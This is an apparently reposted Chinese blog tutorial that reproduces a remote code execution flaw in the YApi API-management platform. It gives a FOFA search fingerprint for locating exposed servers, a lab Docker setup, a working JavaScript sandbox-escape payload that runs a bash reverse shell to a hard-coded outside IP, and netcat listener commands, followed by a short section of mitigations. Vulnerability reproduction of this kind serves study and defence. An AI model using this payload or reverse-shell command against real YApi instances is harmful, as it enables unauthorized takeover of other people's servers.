🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
文章目录
- 🍬 博主介绍
- 一、漏洞描述
- 二、fofa指纹
- 三、利用过程
- 四、环境搭建
* - 1、Docker部署
- 五、代码执行
* - 1、打开登录页面,注册账号
- 2、添加项目、添加接口
- 3、打开高级Mock
- 4、开启脚本
- 5、写入poc
- 6、访问接口
- 7、命令执行成功
- 六、Getshell(nc和nc的反向连接)
* - 1、攻击机监听
- 2、靶机连接
– - 攻击机getshell
- 七、漏洞防御:
* - 1、关闭YApi用户注册功能;修改完成后,重启YApi服务
- 2、暂时关闭mock功能(需要修改YApi代码)
- 3、白名单限制;
- 4、删除恶意
一、漏洞描述
API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。
二、fofa指纹
app="YAPI"
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/0d8b3d6b08b34203997023fa91b612da.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://www.johngo689.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
三、利用过程
1、打开登录页面,注册账号
2、新增项目,新增接口
3、打开高级Mock
4、开启脚本
5、写入poc
6、访问接口
7、getshell
四、环境搭建
1、Docker部署
https://github.com/Ryan-Miao/docker-yapi
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/3de98c8ba61745198ede287720e655ba.png)
可参考连接:
五、代码执行
1、打开登录页面,注册账号
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/793da270181a49bfa542950b2a74cee8.png)
随便填写
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/1e3655dd2f5b4585a287f3a3cb695e1b.png)
; 2、添加项目、添加接口
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/d997f0bf905542e6a63bc63bedcf2bfa.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/2695740bb7124d02b7148281b716720b.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/d335a1b9f2cb4e6fbc9074c715ba1b16.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/3dc330c944da4c9ea25765370c81de79.png)
3、打开高级Mock
4、开启脚本
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/5e06e823a4ae4479bcc7c1502051a3a7.png)
; 5、写入poc
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/6ef71cfc5c5044c5b16e5f6c92abd9c7.png)
6、访问接口
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/5431b3dd3d6c4b62b1e5454da554b93e.png)
; 7、命令执行成功
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/d11582889f2f424cbd43420aee55ef24.png)
六、Getshell(nc和nc的反向连接)
上面我们成功的执行了ls
我们把ls换成反弹shell的命令,就可以成功getshell了
Nc学习可参考链接:
1、攻击机监听
反弹shell我们就用nc就好了,linux系统是自带nc的
攻击机执行nc -lvv 44444进行监听
nc -lvvp 44444
有师傅可能看到我这里执行的是nc -lvv 44444
可能由于我用的vps是centos8的缘故,可能命令不一样。
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/17eb65c33f634c9d9c04b015bb70831a.png)
2、靶机连接
新建项目,新建接口
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/73fc5612463c47209e290adfa4a18231.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/965bdbea0091433cb7470e807baee151.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/09ea3d7c333947d585fec079c2203206.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/66edcd05cd0a4e74a2fa33ccbb496955.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/e7a76f1049ff4375a69652858b915f99.png)
; 打开高级mack,开启脚本,写入poc
就是之前代码执行的步骤。只需要把POC换一下就可以
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/e0a93c0fcc104fffa16f94a718f078ab.png)
POC
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("bash -i>&/dev/tcp/124.70.29.182/44444 0>&1)").toString()
访问接口
直接访问这个链接
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/97305cce0df24730bf4487386f067e24.png)
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/e35728cd21574f628255f73c52cfb2a4.png)
; 攻击机getshell
Shell就反弹回来了
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/3f26eb775efb4475b510c7b8e0740fb3.png)
我们同样执行一下ls
![[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230526/b969891bbbfb4fbd99e7521989d2268d.png)
七、漏洞防御:
1、关闭YApi用户注册功能;修改完成后,重启YApi服务
在"config.json"添加"closeRegister:true"配置项:
{
"port": "*****",
"closeRegister":true
}
2、暂时关闭mock功能(需要修改YApi代码)
在”config.json”中添加”mock: false”;
“exts/yapi-plugin-andvanced-mock/server.js”中找到
if (caseData&&caseData.case_enable{...}
在其上方添加
if(!yapi.WEBCONFIG.mock) {return false;}
3、白名单限制;
安全组配置白名单访问,或者使用NGINX进行代理,限制白名单IP访问;
4、删除恶意
检查用户列表,删除恶意不明用户;并删除恶意不明用户创建的接口及mock脚本。
Original: https://blog.csdn.net/qq_51577576/article/details/126127223
Author: _PowerShell
Title: [ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/560327/
转载文章受原作者版权保护。转载请注明原作者出处!